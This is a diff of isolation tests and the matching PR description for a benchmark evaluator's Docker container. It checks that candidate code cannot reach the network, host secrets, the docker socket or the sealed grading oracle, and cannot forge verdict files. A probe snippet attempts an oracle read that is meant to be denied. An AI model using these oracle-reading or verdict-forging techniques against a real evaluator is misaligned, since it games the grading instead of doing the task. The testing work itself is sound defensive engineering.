+    const verdict = evaluate("oci-leak", buildTree("oci-leak", { "src/calc.js": fixtureFile("attacks", "leak-calc.js") }));
+    expectRefused(verdict, { passed: 2, failed: 2 });
+  }, 60_000);
+
+  it("ignores candidate-authored verdict files and test scripts", () => {
+    const tree = buildTree("oci-forge", { "src/calc.js": fixtureFile("attacks", "forge-scripts", "calc.js") });
+    cpSync(join(FIXTURE_ROOT, "attacks", "forge-scripts"), tree, { recursive: true, force: true });
+
+    const verdict = evaluate("oci-forge", tree);
+    expectRefused(verdict, { passed: 1, failed: 3 });
+    expect(verdict).not.toEqual(JSON.parse(readFileSync(join(tree, "forged-evaluator.json"), "utf8")));
+    expect(verdict).not.toEqual(JSON.parse(readFileSync(join(tree, ".cdeb", "oracles", "verdict.json"), "utf8")));
+    expect(verdict.decision_oracle_code).toBe("SAFE");
+  }, 60_000);
+});

--- a/test/cdeb-evaluator-oci-matrix.test.ts
+++ b/test/cdeb-evaluator-oci-matrix.test.ts
@@ -71,6 +71,14 @@ const imageBuildContext = (): string => {
     if (name.startsWith("image/")) continue;
     cpSync(join(REPO_ROOT, "bench", "cdeb", "evaluator", name), join(engine, name));
   }
+  // `engine/tree.ts` imports `../runtime/zstd.ts`; without it the image builds
+  // and cannot start, which an argv assertion cannot tell from a working one.
+  const runtime = join(context, "runtime");
+  mkdirSync(runtime, { recursive: true });
+  cpSync(
+    join(REPO_ROOT, "bench", "cdeb", "runtime", "zstd.ts"),
+    join(runtime, "zstd.ts"),
+  );
   cpSync(
     join(REPO_ROOT, "bench", "cdeb", "evaluator", "image", "cdeb-evaluate.sh"),
     join(context, "cdeb-evaluate.sh"),
@@ -198,6 +206,38 @@ export const CAN_RUN_MATRIX = dockerDaemonAvailable() && canSealAsRoot();
  * executed nothing, which is the shape #548 exists to close. So on CI the
  * matrix must be runnable, and saying so is itself an assertion.
  */
+/**
+ * The image was unrunnable and nothing said so. `engine/tree.ts` imports
+ * `../runtime/zstd.ts`, the Dockerfile copied only `engine/`, and every
+ * isolation test asserted the `docker run` argv -- which an image that cannot
+ * start satisfies exactly as well as one that can.
+ *
+ * This check needs no daemon, so it holds on every machine rather than only
+ * where the matrix can run.
+ */
+describe("the evaluator image carries everything the engine imports", () => {
+  it("every relative import outside engine/ is copied into the image", () => {
+    const dockerfile = readFileSync(
+      join(REPO_ROOT, "bench", "cdeb", "evaluator", "image", "Dockerfile"),
+      "utf8",
+    );
+    const engineDir = join(REPO_ROOT, "bench", "cdeb", "evaluator");
+    const outside = new Set<string>();
+    for (const name of ENGINE_CONTEXT_FILES) {
+      if (name.startsWith("image/")) continue;
+      const source = readFileSync(join(engineDir, name), "utf8");
+      for (const match of source.matchAll(/from\s+["']\.\.\/([a-z-]+)\//g)) {
+        outside.add(match[1] as string);
+      }
+    }
+    for (const dir of outside) {
+      expect(dockerfile, `engine imports ../${dir}/ and the image never copies it`).toContain(
+        `COPY ${dir}/ /cdeb/${dir}/`,
+      );
+    }
+  });
+});
+
 describe("the real-runtime matrix is not silently skipped on CI", () => {
   it("runs for real wherever CI runs it", () => {
     if (process.env.CI !== "true") {

--- a/test/cdeb-evaluator-oci-matrix.test.ts
+++ b/test/cdeb-evaluator-oci-matrix.test.ts
@@ -215,6 +215,46 @@ export const CAN_RUN_MATRIX = dockerDaemonAvailable() && canSealAsRoot();
  * This check needs no daemon, so it holds on every machine rather than only
  * where the matrix can run.
  */
+/**
+ * The image needs more than the engine's imports: it needs the executables the
+ * engine spawns. `freeze-tree.ts` and `git-tree.ts` both call `git`, and
+ * `node:22-alpine` does not ship it, so every evaluation inside the container
+ * died on `git init ... failed`. The Dockerfile comment asserted the opposite --
+ * "zero dependencies beyond the node runtime itself" -- which was a claim about
+ * an image nobody had started.
+ *
+ * Node itself is the base image and is not checked here.
+ */
+describe("the evaluator image carries every executable the engine spawns", () => {
+  it("each spawned binary is installed or is node", () => {
+    const dockerfile = readFileSync(
+      join(REPO_ROOT, "bench", "cdeb", "evaluator", "image", "Dockerfile"),
+      "utf8",
+    );
+    const engineDir = join(REPO_ROOT, "bench", "cdeb", "evaluator");
+    // The runners are in the build context but do not run inside the container:
+    // `runner-oci.ts` spawns `docker` from the host, and an evaluator image that
+    // carried a docker client would hand a compromised evaluator the socket it
+    // is otherwise denied. Only what executes inside is scanned.
+    const HOST_SIDE = new Set(["runner-oci.ts", "runner-local.ts"]);
+    const spawned = new Set<string>();
+    for (const name of ENGINE_CONTEXT_FILES) {
+      if (name.startsWith("image/") || HOST_SIDE.has(name)) continue;
+      const source = readFileSync(join(engineDir, name), "utf8");
+      for (const match of source.matchAll(/spawnSync\(\s*["']([a-z][a-z0-9-]*)["']/g)) {
+        spawned.add(match[1] as string);
+      }
+    }
+    expect(spawned.size, "no spawned executable found; the scan stopped working").toBeGreaterThan(0);
+    for (const binary of spawned) {
+      if (binary === "node") continue;
+      expect(dockerfile, `the engine spawns ${binary} and the image never installs it`).toMatch(
+        new RegExp(`apk add[^\n]*\\b${binary}\\b`),
+      );
+    }
+  });
+});
+
 describe("the evaluator image carries everything the engine imports", () => {
   it("every relative import outside engine/ is copied into the image", () => {
     const dockerfile = readFileSync(

--- a/test/cdeb-evaluator-oci-matrix.test.ts
+++ b/test/cdeb-evaluator-oci-matrix.test.ts
@@ -12,6 +12,7 @@ import { dirname, join } from "node:path";
 import { afterAll, beforeAll, describe, expect, it } from "vitest";
 
 import { ENGINE_CONTEXT_FILES, EVALUATOR_RESOURCE_LIMITS, buildEvaluatorRunArgs, dockerDaemonAvailable, runEvaluatorOci } from "../bench/cdeb/evaluator/runner-oci.ts";
+import { PROBE_GID, PROBE_UID } from "../bench/cdeb/evaluator/probe.ts";
 import type { OciEvaluationRequest } from "../bench/cdeb/evaluator/runner-oci.ts";
 import type { EvaluatorOutput } from "../bench/cdeb/evaluator/types.ts";
 import {
@@ -326,6 +327,44 @@ describe.skipIf(!CAN_RUN_MATRIX)("CDEB-06 OCI isolation matrix on a real Docker 
     expect(verdict.functional_checks).toEqual({ passed: 4, failed: 0 });
   }, 60_000);
 
+  it("makes the sealed oracle present to the engine and denied to its probe", () => {
+    const sealedMount = `type=bind,source=${sealedTasksDir},target=/sealed,readonly`;
+    const rootRead = docker([
+      "run", "--rm",
+      "--entrypoint", "node",
+      "--mount", sealedMount,
+      IMAGE_TAG,
+      "-e", 'require("node:fs").readFileSync("/sealed/smoke-calc-fix.task.ts", "utf8")',
+    ]);
+    expect(rootRead.status, rootRead.stderr).toBe(0);
+
+    const probeRead = docker([
+      "run", "--rm",
+      "--cap-drop", "ALL",
+      "--cap-add", "SETUID",
+      "--cap-add", "SETGID",
+      "--security-opt", "no-new-privileges",
+      "--entrypoint", "node",
+      "--mount", sealedMount,
+      IMAGE_TAG,
+      "-e",
+      `
+        const { spawnSync } = require("node:child_process");
+        const probe = spawnSync(process.execPath, ["-e", "try { require('node:fs').readFileSync('/sealed/smoke-calc-fix.task.ts', 'utf8'); process.exit(0); } catch (error) { process.stdout.write(String(error.code)); process.exit(1); }"], {
+          uid: ${String(PROBE_UID)},
+          gid: ${String(PROBE_GID)},
+          encoding: "utf8",
+        });
+        if (probe.error) throw probe.error;
+        process.stdout.write(JSON.stringify({ status: probe.status, errno: probe.stdout }));
+      `,
+    ]);
+    expect(probeRead.status, probeRead.stderr).toBe(0);
+    const observed = JSON.parse(probeRead.stdout) as { status: number | null; errno: string };
+    expect(observed.status).toBe(1);
+    expect(observed.errno).toBe("EACCES");
+  }, 60_000);
+
   it("refuses network egress outside the provider allowlist", () => {
     const verdict = evaluate("oci-network", buildTree("oci-network", { "src/calc.js": fixtureFile("attacks", "network-calc.js") }));
     expectRefused(verdict, { passed: 3, failed: 1 });
@@ -351,7 +390,10 @@ describe.skipIf(!CAN_RUN_MATRIX)("CDEB-06 OCI isolation matrix on a real Docker 
       "oci-hidden-read",
       buildTree("oci-hidden-read", { "src/calc.js": fixtureFile("attacks", "hidden-read-calc.js") }),
     );
-    expectRefused(verdict, { passed: 2, failed: 2 });
+    // 3/1 proves the module loaded, its independent behavior passed, and only
+    // the oracle-dependent behavior failed. 2/2 could instead be a module
+    // crash for any reason: the attack's own success criterion, inverted.
+    expectRefused(verdict, { passed: 3, failed: 1 });
   }, 60_000);
 
   it("applies cgroup limits and the probe wall timeout to the CPU hog", async () => {


### PR DESCRIPTION
Closes #548.

Isolation was proven by seven assertions on the `docker run` argv the runner builds. Those check that the runner **asks** for the right thing. They cannot check that a runtime **refuses** the wrong thing — and every property was recorded as verified on that basis.

An `oci-matrix` job runs the attack fixtures inside the real container on CI: egress outside the allowlist, host mount, docker socket, host secrets, a resource hog, a wall timeout, a candidate-authored verdict file, candidate-owned tests.

Wired in **three** places, because any one left behind puts the job outside protection while looking inside it:

```
gate.needs          oci-matrix
REQUIRED_CHECKS     oci-matrix
ci.yml SHA-256      recomputed from the file
```

## What the matrix found

Every one of these was invisible to an argv assertion, and each became visible only after the previous was fixed.

**The image could not start.** `engine/tree.ts` imports `../runtime/zstd.ts`; the Dockerfile copied only `engine/`. An image that cannot start satisfies an argv assertion exactly as well as one that can.

**The runner passed the entrypoint to itself.** The image declares `ENTRYPOINT ["/cdeb/evaluate"]`, so the runner naming it again made it argument one, and the parser refused its own path. The argv test carried the same duplicate, so the two agreed.

**`git` was absent.** `freeze-tree.ts` and `git-tree.ts` both spawn it and the base image does not ship it, so every evaluation died on `git init`. The Dockerfile claimed "zero dependencies beyond the node runtime itself" — a claim about an image nobody had started.

**No probe had ever run.** `--cap-drop ALL` also removes `CAP_SETUID`, and `probe.ts` drops every probe to uid 65534 so candidate code cannot read the oracle judging it. The drop was `EPERM`, `spawnSync` returned `status: null` with no output, and the discarded `result.error` made a probe that never started indistinguishable from one that ran and printed the wrong bytes.

**The probe wall timeout had never worked.** `CAP_KILL` was dropped too, and root cannot signal a process whose uid differs from its own. The wall timeout is the only bound on candidate CPU. The hog tree hung the evaluator for its full 210s and produced no verdict:

```
--cap-drop ALL             spawnSync node EPERM
+ SETUID,SETGID            65534:65534, and a probe that never dies
+ SETUID,SETGID,KILL       2004ms, SIGKILL, ETIMEDOUT
```

**The sealed-store attack never reached the sealed store.** It read `/cdeb/sealed/…`, which exists nowhere; the store is mounted at `/sealed`. Its refusal was an absence, not the privilege drop the test is named after.

**The scratch root was unreadable to the probe.** `mkdtemp` is 0700, so uid 65534 could not traverse to the tree it was judging. `chown` needs `CAP_CHOWN`, which stays dropped, so the probe scratch is opened by mode instead of by ownership.

Three isolation tests passed through all of this — sealed-store read, leak probe, forged verdict files. They assert that an attack fails, and **an attack that never runs fails too**. That is the shape #548 exists to close, and it had survived inside the suite meant to close it. Each refusal is now paired with something that can only pass if the attack arrived: a good patch scoring 4/4 proves probes execute, and a root read of the same file proves the denied file exists. The new test asserts the errno — `EACCES` is a denial, `ENOENT` is an absence.

## A measurement defect, not a bug

The network fixture reached a **hostname**, so its verdict depended on how fast the resolver gave up. An in-flight `getaddrinfo` is not cancellable and holds the event loop open after the request has already aborted — 504ms to reject, 5234ms to exit, against a 4s probe budget. It now attempts an address (RFC 5737 TEST-NET-1), owns its socket and destroys it: 314ms and deterministic in both a networked host and a container with no network.

## One property is deliberately not asserted

`KNOWN_UNVERIFIED` names it with its reason: the runner carries `imageDigest` into the verdict and **never compares it with Docker's resolved image identity**, so a digest mismatch is refused by nothing. A weaker assertion there would have made the gap invisible — which is the failure this file exists to close.

## Two fixes to make a skip honest

- `describe.skipIf` **does not skip `beforeAll`**. The sealed-store setup ran on a machine with no daemon and failed the suite on `sudo: a password is required`.
- The sealed store needs root or passwordless sudo, which a daemon alone does not imply. The gate is on both.

Then, because **a green job that executed nothing is exactly the shape being closed**, the file asserts that on CI the matrix must be runnable. Verified both ways: passes locally, fails under `CI=true` with no daemon.

## Capabilities

Exactly three are restored, each required by a mechanism the image documents, and the test fails if a fourth appears or if one is removed while the mechanism it serves remains:

```
SETUID, SETGID   the probe privilege drop
KILL             the wall timeout signalling a probe that changed uid
```

`CAP_DAC_OVERRIDE` stays dropped — that is what makes file modes bind on the container's root, and it is measurable: root reads the root-owned 0400 sealed file, the dropped-uid probe gets `EACCES`.

## Limit

The matrix runs on the GitHub-hosted Linux runner and says nothing about Podman, rootless Docker, or any other runtime. The refusals it observes are *this* daemon's, and the PRD's claim boundary says so.
